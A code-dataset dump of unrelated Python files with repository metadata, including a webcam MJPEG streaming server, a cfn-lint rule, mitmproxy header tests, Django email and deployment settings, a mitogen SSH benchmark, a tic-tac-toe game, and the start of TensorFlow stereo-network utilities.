| 2020-01-29T14:14:10
| 60,902,385
| 0
| 0
|
MIT
| 2022-12-07T23:34:36
| 2016-06-11T10:36:10
|
Python
|
UTF-8
|
Python
| false
| false
| 3,094
|
py
|
import SimpleHTTPServer
import urllib
import StringIO
import posixpath, sys, string
import time
from VideoCapture import *
cam = Device(devnum=0)
#~ cam.setResolution(640, 480) # VGA
#~ cam.setResolution(768, 576) # PAL
#~ cam.setResolution(384, 288) # PAL / 4
#~ cam.setResolution(192, 144) # PAL / 16
#~ cam.setResolution(80, 60) # Minimum
sys.stderr = sys.stdout
class MyHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def sendImage(self):
try:
image = cam.getImage(timestamp=3, boldfont=1)
stros = StringIO.StringIO()
image.save(stros, "jpeg")
jpgStr = stros.getvalue()
sys.stderr.write("len: %d\n" % len(jpgStr))
self.send_response(200)
self.send_header("Content-type", "image/jpeg")
self.end_headers()
self.wfile.write(jpgStr)
except:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write("Problem sending image: %s\n" % self.path)
def pushImages(self):
self.separator = "abcdef"
self.maxFrames = 0
try:
self.send_response(200)
self.send_header("Content-type",
"multipart/x-mixed-replace;boundary=%s" % self.separator)
self.end_headers()
self.wfile.write("--%s\r\n" % self.separator)
frameNo = 0
while 1:
time.sleep(0.04)
frameNo = frameNo + 1
if self.maxFrames > 0 and frameNo > 1000:
break
image = cam.getImage(timestamp=3, boldfont=1)
stros = StringIO.StringIO()
image.save(stros, "jpeg")
jpgStr = stros.getvalue()
sys.stderr.write("len: %d\n" % len(jpgStr))
self.wfile.write("Content-type: image/jpeg\r\n")
#self.wfile.write("Content-length: %d\r\n" % len(jpgStr))
self.wfile.write("\r\n")
self.wfile.write(jpgStr)
self.wfile.write("\r\n--%s\r\n" % self.separator)
except:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write("Problem sending image: %s\n" % self.path)
def do_GET(self):
"""Serve a GET request."""
if self.path[:len("/quit")] == "/quit":
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write("exiting....")
global cam
del cam
sys.exit(0)
if self.path[:len("/cam")] == "/cam":
self.sendImage()
return
if self.path[:len("/push")] == "/push":
self.pushImages()
return
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
return
if len(sys.argv) == 1:
sys.argv = (sys.argv[0], "8000")
SimpleHTTPServer.test(MyHandler)
|
[
"soheil_paper@yahoo.com"
] |
soheil_paper@yahoo.com
|
2dd34ed91d4e5ea625355a87413ad5af693536b9
|
f5ef25c84e9b4846f98d520bc9a20d20b3d1b65c
|
/set/set1.py
|
6741123a44faca8e18c340dcbfe9628da7fabf2d
|
[] |
no_license
|
amiraHag/python-basic-course2
|
45757ffdfa677c2accd553330cd2fd825208b0aa
|
1fbfd08b34f3993299d869bd55c6267a61dc7810
|
refs/heads/main
| 2023-03-31T06:48:11.587127
| 2021-03-30T03:43:10
| 2021-03-30T03:43:10
| 327,271,713
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,162
|
py
|
# ---------------------------------------------------------------------------------------
#
# -----------------------
# --------- Set ---------
# -----------------------
#
#
# [1] Set Items Are Enclosed in Curly Braces
# [2] Set Items Are Not Ordered And Not Indexed
# [3] Set Indexing and Slicing Cant Be Done
# [4] Set Has Only Immutable Data Types (Numbers, Strings, Tuples) List and Dict Are Not
# [5] Set Items Is Unique
# ---------------------------------------------------------------------------------------
# used {} not [] like lists or () like tuples
set1 = {"Amira",100,True,2,30,4,5,6,7,8}
# Set items Not Ordered And Not Indexed NOt Slicing
print(set1)
#print(set1[2]) Error -> TypeError: 'set' object does not support indexing
#print(set1[1:3]) Error -> TypeError: 'set' object is not subscriptable
# Set elements from Only Immutable Data Types
#mySet2 = {"Amira", 4, 1.5, True, [1, 2, 3]} # Eror -> TypeError: unhashable type: 'list'
#print(mySet2)
mySet3 = {"Amira", 4, 1.5, True, (1, 2, 3)}
print(mySet3)
# Set Items Is Unique
mySet4 = {1, 2, "A", "B", "A", True, 54, 2} # Will remove the repeated version of the element
print(mySet4)
|
[
"amira071846@feng.bu.edu.eg"
] |
amira071846@feng.bu.edu.eg
|
88492f33f8de534399893ebb273852326688d51d
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/last_thing/come_new_day_at_own_point/have_problem_of_own_year/different_eye.py
|
06693d6b27f56d6d2f8b7d46e4ca6e54ac2525b6
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162
| 2016-08-19T07:20:12
| 2016-08-19T07:20:12
| 60,834,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 277
|
py
|
#! /usr/bin/env python
def feel_other_person_for_young_hand(str_arg):
find_work_from_own_group(str_arg)
print('use_person')
def find_work_from_own_group(str_arg):
print(str_arg)
if __name__ == '__main__':
feel_other_person_for_young_hand('different_thing')
|
[
"jingkaitang@gmail.com"
] |
jingkaitang@gmail.com
|
57f40905b587a23a5f6f1a4d5e6fed0da1a38750
|
85c57781b746a141e469843ff7d94577cd4bf2a5
|
/src/cfnlint/rules/functions/FindInMapKeys.py
|
6b12f775741e2caf583e17463ca2cdc750de9a07
|
[
"MIT-0"
] |
permissive
|
genums/cfn-python-lint
|
ac2ea0d9a7997ed599ba9731127a6cada280f411
|
b654d7fc0ed249d0522b8168dc7e1f4170675bc4
|
refs/heads/master
| 2020-04-18T00:49:03.922092
| 2019-01-21T23:58:02
| 2019-01-21T23:58:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,940
|
py
|
"""
Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
Permission is hereby granted, free of charge, to any person obtaining a copy of this
software and associated documentation files (the "Software"), to deal in the Software
without restriction, including without limitation the rights to use, copy, modify,
merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import six
from cfnlint import CloudFormationLintRule
from cfnlint import RuleMatch
class FindInMapKeys(CloudFormationLintRule):
"""Check if FindInMap values are correct"""
id = 'W1011'
shortdesc = 'FindInMap keys exist in the map'
description = 'Checks the keys in a FindInMap to make sure they exist. ' \
'Check only if the Map Name is a string and if the key is a string.'
source_url = 'https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/intrinsic-function-reference-findinmap.html'
tags = ['functions', 'findinmap']
def check_keys(self, map_name, keys, mappings, tree):
""" Check the validity of the first key """
matches = []
first_key = keys[0]
second_key = keys[1]
if isinstance(second_key, (six.string_types, int)):
if isinstance(map_name, (six.string_types)):
mapping = mappings.get(map_name)
if mapping:
if isinstance(first_key, (six.string_types, int)):
if isinstance(map_name, (six.string_types)):
if not mapping.get(first_key):
message = 'FindInMap first key "{0}" doesn\'t exist in map "{1}" at {3}'
matches.append(RuleMatch(
tree[:] + [1],
message.format(first_key, map_name, first_key, '/'.join(map(str, tree)))))
if mapping.get(first_key):
# Don't double error if they first key doesn't exist
if not mapping.get(first_key, {}).get(second_key):
message = 'FindInMap second key "{0}" doesn\'t exist in map "{1}" under "{2}" at {3}'
matches.append(RuleMatch(
tree[:] + [2],
message.format(second_key, map_name, first_key, '/'.join(map(str, tree)))))
else:
for key, value in mapping.items():
if not value.get(second_key):
message = 'FindInMap second key "{0}" doesn\'t exist in map "{1}" under "{2}" at {3}'
matches.append(RuleMatch(
tree[:] + [2],
message.format(second_key, map_name, key, '/'.join(map(str, tree)))))
return matches
def match(self, cfn):
"""Check CloudFormation GetAtt"""
matches = []
findinmaps = cfn.search_deep_keys('Fn::FindInMap')
mappings = cfn.get_mappings()
for findinmap in findinmaps:
tree = findinmap[:-1]
map_obj = findinmap[-1]
if len(map_obj) == 3:
matches.extend(self.check_keys(map_obj[0], map_obj[1:], mappings, tree))
return matches
|
[
"kddejong@amazon.com"
] |
kddejong@amazon.com
|
8b22a1578d5df4953a56da36b6c4398aa6b003a2
|
d2e80a7f2d93e9a38f37e70e12ff564986e76ede
|
/Python-cookbook-2nd/cb2_15/cb2_15_1_exm_1.py
|
1ed468d0c137493859fbf02087e909f3b6df71d7
|
[] |
no_license
|
mahavivo/Python
|
ceff3d173948df241b4a1de5249fd1c82637a765
|
42d2ade2d47917ece0759ad83153baba1119cfa1
|
refs/heads/master
| 2020-05-21T10:01:31.076383
| 2018-02-04T13:35:07
| 2018-02-04T13:35:07
| 54,322,949
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 351
|
py
|
from xmlrpclib import Server
server = Server("http://www.oreillynet.com/meerkat/xml-rpc/server.php")
class MeerkatQuery(object):
def __init__(self, search, num_items=5, descriptions=0):
self.search = search
self.num_items = num_items
self.descriptions = descriptions
q = MeerkatQuery("[Pp]ython")
print server.meerkat.getItems(q)
|
[
"mahavivo@126.com"
] |
mahavivo@126.com
|
616900694b0862636d221e3a8773a98780b7afd3
|
493c7d9678a0724736fb9dd7c69580a94099d2b4
|
/apps/utils/email_send.py
|
36fe5822fba9d09e3c79655bd951767e0024091b
|
[] |
no_license
|
cuixiaozhao/MxOnline
|
e253c8c5f5fa81747d8e1ca064ce032e9bd42566
|
c96ae16cea9ad966df36e9fcacc902c2303e765c
|
refs/heads/master
| 2020-03-29T18:47:11.158275
| 2018-10-22T14:06:50
| 2018-10-22T14:06:50
| 150,231,387
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,622
|
py
|
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# Project: MxOnline
# Software: PyCharm
# Time : 2018-09-27 18:41
# File : email_send.py
# Author : 天晴天朗
# Email : tqtl@tqtl.org
from users.models import EmailVerifyRecord
from random import Random
from django.core.mail import send_mail
from MxOnline.settings import EMAIL_FROM
def random_str(randomlength=8):
str = ''
chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz01234567890'
length = len(chars) - 1
random = Random()
for i in range(randomlength):
str += chars[random.randint(0, length)]
return str
def send_register_email(email, send_type="register"):
email_record = EmailVerifyRecord()
code = random_str(16)
email_record.code = code
email_record.email = email
email_record.send_type = send_type
email_record.save()
# 定义E-mail的主题与主体内容;
email_title = ""
email_body = ""
if send_type == "register":
email_title = "慕学在线网注册激活链接"
email_body = "请点击下面的链接来激活你的账号:http://127.0.0.1:8000/active/{0}".format(code)
send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])
if send_status:
pass
elif send_type == "forget":
email_title = "慕学在线网重置链接"
email_body = "请点击下面的链接来重置你的账号:http://127.0.0.1:8000/reset/{0}".format(code)
send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])
if send_status:
pass
def generate_random_str():
pass
|
[
"19930911cXS"
] |
19930911cXS
|
ecfe7678744fa8d9f0e8c01aab200b5c1f9f6562
|
6fb1d9f617ad89c5ac7e4280f07a88bdb8b02aee
|
/test/mitmproxy/builtins/test_setheaders.py
|
41c1836059fa20e5bf5afa43edf5bd300b45f47c
|
[
"MIT"
] |
permissive
|
tigerqiu712/mitmproxy
|
e689f5d87e91837a6853b1a1402269ba3be4fcbc
|
dcfa7027aed5a8d4aa80aff67fc299298659fb1b
|
refs/heads/master
| 2021-01-12T22:38:19.735004
| 2016-08-04T22:39:48
| 2016-08-04T22:39:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,925
|
py
|
from .. import tutils, mastertest
from mitmproxy.builtins import setheaders
from mitmproxy.flow import state
from mitmproxy import options
class TestSetHeaders(mastertest.MasterTest):
    """Tests for the setheaders addon (filter, header, value triples)."""

    def mkmaster(self, **opts):
        # Build a recording master with a SetHeaders addon installed,
        # configured from the given options.
        s = state.State()
        o = options.Options(**opts)
        m = mastertest.RecordingMaster(o, None, s)
        sh = setheaders.SetHeaders()
        m.addons.add(o, sh)
        return m, sh

    def test_configure(self):
        # An invalid filter expression ("~b" needs an argument pattern
        # that parses) must be rejected at configure time.
        sh = setheaders.SetHeaders()
        o = options.Options(
            setheaders = [("~b", "one", "two")]
        )
        tutils.raises(
            "invalid setheader filter pattern",
            sh.configure, o, o.keys()
        )

    def test_setheaders(self):
        # Request filter rewrites the request header, response filter
        # rewrites the response header.
        m, sh = self.mkmaster(
            setheaders = [
                ("~q", "one", "two"),
                ("~s", "one", "three")
            ]
        )
        f = tutils.tflow()
        f.request.headers["one"] = "xxx"
        self.invoke(m, "request", f)
        assert f.request.headers["one"] == "two"

        f = tutils.tflow(resp=True)
        f.response.headers["one"] = "xxx"
        self.invoke(m, "response", f)
        assert f.response.headers["one"] == "three"

        # Two matching response rules replace the header with BOTH
        # configured values, in order.
        m, sh = self.mkmaster(
            setheaders = [
                ("~s", "one", "two"),
                ("~s", "one", "three")
            ]
        )
        f = tutils.tflow(resp=True)
        f.request.headers["one"] = "xxx"
        f.response.headers["one"] = "xxx"
        self.invoke(m, "response", f)
        assert f.response.headers.get_all("one") == ["two", "three"]

        # Same multi-value behaviour on the request side.
        m, sh = self.mkmaster(
            setheaders = [
                ("~q", "one", "two"),
                ("~q", "one", "three")
            ]
        )
        f = tutils.tflow()
        f.request.headers["one"] = "xxx"
        self.invoke(m, "request", f)
        assert f.request.headers.get_all("one") == ["two", "three"]
|
[
"aldo@nullcube.com"
] |
aldo@nullcube.com
|
6db9bb5b24703aab877180c00f818cc1d8c49db5
|
8d13818c4aa7e32df594b3859344812669fd26f1
|
/school_navigator/settings/deploy.py
|
7d1186222c366849ebeca052151a059af60ef6a0
|
[] |
no_license
|
rosalsm/school-navigator
|
ee4ea47d9845900b22836b93bdc82862a8e53741
|
a41cb0721da3f7c7cd43ae76f162db51c764d8ea
|
refs/heads/master
| 2020-12-07T03:50:24.615270
| 2016-03-09T02:37:12
| 2016-03-09T02:37:12
| 54,512,859
| 0
| 0
| null | 2016-03-22T22:25:43
| 2016-03-22T22:25:42
| null |
UTF-8
|
Python
| false
| false
| 1,893
|
py
|
# Settings for live deployed environments: vagrant, staging, production, etc
from .base import * # noqa
# Defaults for service hosts; real deployments override via the environment.
os.environ.setdefault('CACHE_HOST', '127.0.0.1:11211')
os.environ.setdefault('BROKER_HOST', '127.0.0.1:5672')

# Required: names the target environment (e.g. staging/production) and
# is interpolated into database names, email subjects, and broker vhosts.
ENVIRONMENT = os.environ['ENVIRONMENT']

DEBUG = False

# Per-environment database credentials; host/port/password come from env vars.
DATABASES['default']['NAME'] = 'school_navigator_%s' % ENVIRONMENT.lower()
DATABASES['default']['USER'] = 'school_navigator_%s' % ENVIRONMENT.lower()
DATABASES['default']['HOST'] = os.environ.get('DB_HOST', '')
DATABASES['default']['PORT'] = os.environ.get('DB_PORT', '')
DATABASES['default']['PASSWORD'] = os.environ.get('DB_PASSWORD', '')

# Static/media files served from the public web root.
WEBSERVER_ROOT = '/var/www/school_navigator/'
PUBLIC_ROOT = os.path.join(WEBSERVER_ROOT, 'public')
STATIC_ROOT = os.path.join(PUBLIC_ROOT, 'static')
MEDIA_ROOT = os.path.join(PUBLIC_ROOT, 'media')

CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
        'LOCATION': '%(CACHE_HOST)s' % os.environ,
    }
}

EMAIL_SUBJECT_PREFIX = '[School_Navigator %s] ' % ENVIRONMENT.title()
DEFAULT_FROM_EMAIL = 'noreply@%(DOMAIN)s' % os.environ
SERVER_EMAIL = DEFAULT_FROM_EMAIL

COMPRESS_ENABLED = True

# Cookies restricted to HTTPS and inaccessible to client-side scripts.
SESSION_COOKIE_SECURE = True
SESSION_COOKIE_HTTPONLY = True

ALLOWED_HOSTS = [os.environ['DOMAIN']]

# Uncomment if using celery worker configuration
CELERY_SEND_TASK_ERROR_EMAILS = True
BROKER_URL = 'amqp://school_navigator_%(ENVIRONMENT)s:%(BROKER_PASSWORD)s@%(BROKER_HOST)s/school_navigator_%(ENVIRONMENT)s' % os.environ  # noqa

# Environment overrides
# These should be kept to an absolute minimum
if ENVIRONMENT.upper() == 'LOCAL':
    # Don't send emails from the Vagrant boxes
    EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'

ADMINS = (
    ('Colin Copeland', 'ccopeland@codeforamerica.org'),
)
MANAGERS = ADMINS

LOGGING['handlers']['file']['filename'] = '/var/www/school_navigator/log/schools.log'
|
[
"copelco@caktusgroup.com"
] |
copelco@caktusgroup.com
|
d916feda1d6f1e80da823656bd4c71d6f4dd5a02
|
d0d1e07c984651f96bd9386d546c85c0341e46b2
|
/timedata/control/envelope/segments.py
|
16160ce32aeb7e7df7a512c946d3aac288a9636c
|
[
"MIT"
] |
permissive
|
timedata-org/timedata
|
61cde905b1fe9eb60ac83ecbf5a5a2114793c45d
|
3faac7450678aaccd4a283d0d41ca3e7f113f51b
|
refs/heads/master
| 2020-04-11T12:03:57.962646
| 2019-06-09T10:05:16
| 2019-06-09T10:05:52
| 51,217,217
| 5
| 3
| null | 2016-09-18T16:20:43
| 2016-02-06T19:13:43
|
C++
|
UTF-8
|
Python
| false
| false
| 1,116
|
py
|
class Segments(list):
    """A piecewise-linear envelope stored as a list of [level, time] pairs.

    Each entry holds a target level and the duration spent ramping to it.
    Entries whose duration is unspecified are assigned the mean duration
    of the specified ones, or an even share of *length* when none are
    specified.
    """

    def __init__(self, segments=(), length=None):
        super().__init__()
        self.base_value = 0

        for entry in segments:
            try:
                lvl, dur = entry
            except TypeError:
                # A bare number: level only; duration filled in below.
                lvl, dur = entry, None
            self.append([lvl, dur])

        known = [dur for _lvl, dur in self if dur is not None]
        if known:
            fill = sum(known) / len(known)
        else:
            fill = (length or 1) / max(1, len(self))

        for pair in self:
            if pair[1] is None:
                pair[1] = fill

        # Total duration of the whole envelope.
        self.total_time = sum(dur for _lvl, dur in self)

    def __call__(self, time, base_value=0):
        """Return the interpolated level at *time*, starting from *base_value*.

        Past the end of the envelope, the final level is held.
        """
        start = 0
        current = base_value
        for lvl, dur in self:
            end = start + dur
            if time < end:
                # Linear interpolation within this segment.
                return current + (lvl - current) * (time - start) / dur
            start = end
            current = lvl
        return current
|
[
"tom@swirly.com"
] |
tom@swirly.com
|
474c9f5e02f118f0f06da4331b7c2bd065301b36
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/NyTjy8nmHj9bmxMTC_14.py
|
e3c771df7a753dd5a3ce288cd92845294dcedb72
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 171
|
py
|
import math
from decimal import Decimal


def vol_pizza(radius, height):
    """Return the volume of a cylindrical pizza, rounded to an integer.

    Volume is pi * r^2 * h; the value is routed through Decimal before
    rounding, exactly as the original implementation does.
    """
    volume = radius * radius * height * math.pi
    return round(Decimal(volume))
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
dd2c7c4d2446ea1919e10264fc0438137e66880e
|
f2d1362eea91a090cdec4f232ef168f0837a5f5d
|
/tests/bench/ssh-roundtrip.py
|
8745505d2470f6f5065b38cb82c7fa585e3ac501
|
[
"BSD-3-Clause"
] |
permissive
|
marc1006/mitogen
|
2296e7d7618d130efcd42d355ace16d536237364
|
2ed8395d6ce2adc6a252b68c310646707348f3a1
|
refs/heads/master
| 2022-05-19T19:38:30.053265
| 2019-08-08T16:50:40
| 2019-08-08T16:54:33
| 201,296,264
| 0
| 0
| null | 2019-08-08T16:25:20
| 2019-08-08T16:25:20
| null |
UTF-8
|
Python
| false
| false
| 597
|
py
|
"""
Measure latency of SSH RPC.
"""
import sys
import time
import mitogen
import mitogen.utils
import ansible_mitogen.affinity
mitogen.utils.setup_gil()
ansible_mitogen.affinity.policy.assign_worker()

# Python 2/3 compatibility shim (xrange is not referenced below; kept
# from the original benchmark template).
try:
    xrange
except NameError:
    xrange = range


def do_nothing():
    """No-op RPC target, so the loop measures pure call overhead."""
    pass


@mitogen.main()
def main(router):
    """Benchmark SSH RPC round-trip latency over a ~5 second window."""
    # Connect over SSH to the host named on the command line.
    f = router.ssh(hostname=sys.argv[1])
    # One warm-up call keeps connection setup out of the timed loop.
    f.call(do_nothing)
    t0 = time.time()
    end = time.time() + 5.0
    i = 0
    while time.time() < end:
        f.call(do_nothing)
        i += 1
    t1 = time.time()
    # Mean round-trip time in milliseconds.
    # NOTE(review): divides by i+1 although only i calls fall inside the
    # timed window (also guards against i == 0) — confirm intended.
    print('++', float(1e3 * (t1 - t0) / (1.0+i)), 'ms')
|
[
"dw@botanicus.net"
] |
dw@botanicus.net
|
dbddee33c2e3dad0c8f9955deb3e40d75449a052
|
cebf2e5276e6d064d0ec86beaf1129fe0d0fd582
|
/days081-090/day083/project/tic_tac_toe.py
|
04fa7c9806b6d01e22dbdb0233b6d24bcf3ad8d4
|
[] |
no_license
|
SheikhFahimFayasalSowrav/100days
|
532a71c5c790bc28b9fd93c936126a082bc415f5
|
0af9f2f16044facc0ee6bce96ae5e1b5f88977bc
|
refs/heads/master
| 2023-06-14T06:18:44.109685
| 2021-07-08T16:58:13
| 2021-07-08T16:58:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,504
|
py
|
import random
EMPTY = '_'
CROSS = 'X️'
DOT = 'O'
class TicTacToe:
    """Console tic-tac-toe for two players over multiple rounds.

    Board cells are addressed 1-9 (see POS_DICT). Player 1 plays CROSS
    and always moves first; the players swap roles between rounds.
    """

    # Maps the 1-9 cell number a player types to a (row, col) index.
    POS_DICT = {
        1: (0, 0),
        2: (0, 1),
        3: (0, 2),
        4: (1, 0),
        5: (1, 1),
        6: (1, 2),
        7: (2, 0),
        8: (2, 1),
        9: (2, 2),
    }

    def __init__(self, players):
        # 3x3 board filled with the EMPTY marker.
        self.board = [[EMPTY for _i in range(3)] for _j in range(3)]
        # Win counters keyed by upper-cased player name, plus 'DRAW'.
        self.winners = {'DRAW': 0, players[0].upper(): 0, players[1].upper(): 0}
        # Randomly pick who is player 1 for the first round.
        self.player1 = random.choice(players)
        players.remove(self.player1)
        self.player2 = players[0]
        self.round = 1
        self.turn = 0
        self.game_over = False

    def start(self):
        """Print the rules and this round's player assignment."""
        print('\nRules:')
        print('  Player 1 always starts.')
        print('  Players are selected randomly for first round.')
        print('  Player 1 is "X", Player 2 is "O".')
        print('  You must select a number from 1 to 9')
        print('when choosing a move, as follows:')
        print('\n 1 2 3\n 4 5 6\n 7 8 9')
        print('\nFor this round:')
        print('Player 1:', self.player1)
        print('Player 2:', self.player2)

    def convert_pos(self, index):
        """Translate a 1-9 cell number to (row, col), or None if invalid."""
        return self.POS_DICT.get(index, None)

    def is_available(self, row, col):
        """True when the cell is still empty."""
        return self.board[row][col] == EMPTY

    def play(self):
        """Prompt the current player for a move; return True if applied.

        NOTE(review): int(input(...)) raises ValueError on non-numeric
        input — confirm whether that should be handled.
        """
        index = int(input(f'Enter a position on the board {self.player1 if self.turn % 2 == 0 else self.player2}: '))
        pos = self.convert_pos(index)
        if pos is None:
            print('Invalid position entered!')
            return False
        row, col = pos
        if not self.is_available(row, col):
            print('Position is not a free space!')
            return False
        # Even turns belong to player 1 (CROSS), odd turns to player 2 (DOT).
        self.board[row][col] = CROSS if self.turn % 2 == 0 else DOT
        self.turn += 1
        return True

    def reset(self):
        """Either start a fresh round (swapping players) or end the game."""
        if input('Type "yes" if you wish to keep playing? ').lower() == 'yes':
            self.board = [[EMPTY for _i in range(3)] for _j in range(3)]
            self.turn = 0
            self.round += 1
            self.player1, self.player2 = self.player2, self.player1
            print("\nATTENTION: The players have been switched!!!")
            print('\nFor this round:')
            print('Player 1:', self.player1)
            print('Player 2:', self.player2)
        else:
            self.game_over = True

    def final_output(self):
        """Print per-player totals and declare the overall winner."""
        print(f"\nYou have played {self.round} rounds.\n")
        for winner, score in self.winners.items():
            print(f'{winner} won {score} times.')
        # Drop the draw counter so max() only considers the two players.
        del self.winners['DRAW']
        winner = max(self.winners, key=self.winners.get)
        print(f'\n{winner} is the final winner!')

    def check_board(self):
        """Return the marker that completes a line, if any.

        May return EMPTY when a line of blank cells matches (e.g. an
        untouched row); check_game filters that case out.
        """
        b_dict = {
            1: self.board[0][0],
            2: self.board[0][1],
            3: self.board[0][2],
            4: self.board[1][0],
            5: self.board[1][1],
            6: self.board[1][2],
            7: self.board[2][0],
            8: self.board[2][1],
            9: self.board[2][2],
        }
        # Rows/columns/diagonals, each reported via one of its cells.
        if b_dict[1] == b_dict[2] == b_dict[3] or b_dict[1] == b_dict[4] == b_dict[7]:
            return b_dict[1]
        if b_dict[4] == b_dict[5] == b_dict[6] or b_dict[2] == b_dict[5] == b_dict[8]:
            return b_dict[5]
        if b_dict[7] == b_dict[8] == b_dict[9] or b_dict[3] == b_dict[6] == b_dict[9]:
            return b_dict[9]
        if b_dict[1] == b_dict[5] == b_dict[9] or b_dict[3] == b_dict[5] == b_dict[7]:
            return b_dict[5]

    def check_game(self):
        """After a move: record a draw or a win and reset the round.

        NOTE(review): a game won on the 9th move is counted as a draw
        here AND as a win below (both branches run) — confirm intended.
        """
        if self.turn == 9:
            self.winners['DRAW'] += 1
            print("\nFinal board:")
            print(self)
            print("It's a DRAW!")
            self.reset()
        # A win needs at least 5 moves (3 by the first player).
        if self.turn >= 5:
            winner = self.check_board()
            if winner != EMPTY and winner is not None:
                print("\nFinal board:")
                print(self)
                winner_name = self.player1 if winner == CROSS else self.player2
                print(f'This round was won by {winner_name}!')
                self.winners[winner_name.upper()] += 1
                self.reset()

    def __str__(self):
        # Render the board as three space-separated rows.
        lines = [' '.join(self.board[x]) for x in range(3)]
        return '\n'.join(lines)
# Game driver: read the two player names, then loop one prompt per move
# until a round ends and the players decline to continue.
print("Welcome to Tic Tac Toe!")
game = TicTacToe(input('Enter the name for the players: ').split())
game.start()
while not game.game_over:
    print("\nCurrent board: ")
    print(game)
    # Only evaluate the board when the move was actually applied.
    if game.play():
        game.check_game()
game.final_output()
|
[
"pullynnhah@icloud.com"
] |
pullynnhah@icloud.com
|
8511a92526362590653b4d46e0952834d47a5b81
|
2871a5c3d1e885ee72332dbd8ff2c015dbcb1200
|
/SteReFo/stereonet/utils.py
|
65da3b85dd3f3fd2addb467268b0901a7c58105a
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
huawei-noah/noah-research
|
297476299ad040552e44656541858145de72d141
|
82c49c36b76987a46dec8479793f7cf0150839c6
|
refs/heads/master
| 2023-08-16T19:29:25.439701
| 2023-08-14T03:11:49
| 2023-08-14T03:11:49
| 272,853,727
| 816
| 171
| null | 2023-09-12T01:28:36
| 2020-06-17T01:53:20
|
Python
|
UTF-8
|
Python
| false
| false
| 4,760
|
py
|
#Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#This program is free software; you can redistribute it and/or modify it under the terms of the BSD 0-Clause License.
#This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the BSD 0-Clause License for more details.
import tensorflow as tf
import numpy as np
import re
def conv2d(inputs, filters, kernel_size, name, strides=1, dilation_rate=1):
    """2D convolution with 'same' padding, Xavier weights, zero bias (TF1)."""
    return tf.layers.conv2d(inputs=inputs, filters=filters, kernel_size=kernel_size, strides=strides, padding='same',
                            kernel_initializer=tf.contrib.layers.xavier_initializer(), bias_initializer=tf.zeros_initializer(), dilation_rate=dilation_rate,
                            name=name)
def conv3d(input, num_outputs, kernel_size, name):
    """3D convolution with 'same' padding, Xavier weights, no activation (TF1)."""
    return tf.layers.conv3d(inputs=input, filters=num_outputs, kernel_size=kernel_size, kernel_initializer=tf.contrib.layers.xavier_initializer(), activation=None, padding='same', name=name)
def resnet_block(inputs, filters, kernel_size, name, dilation_rate=1):
    """Residual block: conv-relu-conv, skip connection, final relu.

    `filters` must equal the channel count of `inputs` for the tf.add
    skip connection to be shape-compatible.
    """
    out = conv2d(inputs=inputs, filters=filters, kernel_size=kernel_size, name=name + '_conv1', dilation_rate=dilation_rate)
    out = tf.nn.relu(out,name=name + '_relu1')
    out = conv2d(inputs=out, filters=filters, kernel_size=kernel_size, name=name + '_conv2', dilation_rate=dilation_rate)
    # Identity skip connection, then the second non-linearity.
    out = tf.add(out, inputs, name=name + '_add')
    out = tf.nn.relu(out,name=name + '_relu2')
    return out
def lcn_preprocess(input_tensor):
    """
    Returns the normalised and centered values of a tensor, along with its standard dev.

    Local contrast normalisation over a 9x9 window: each pixel is centred
    on its local mean and divided by its local standard deviation.
    Expects a 4-D NHWC tensor with 3 channels (the 9x9x3x1 filter below
    fixes the channel count).
    """
    full_h = int(input_tensor.shape[1])
    full_w = int(input_tensor.shape[2])
    ##compute local averages
    ones = tf.ones_like(input_tensor)
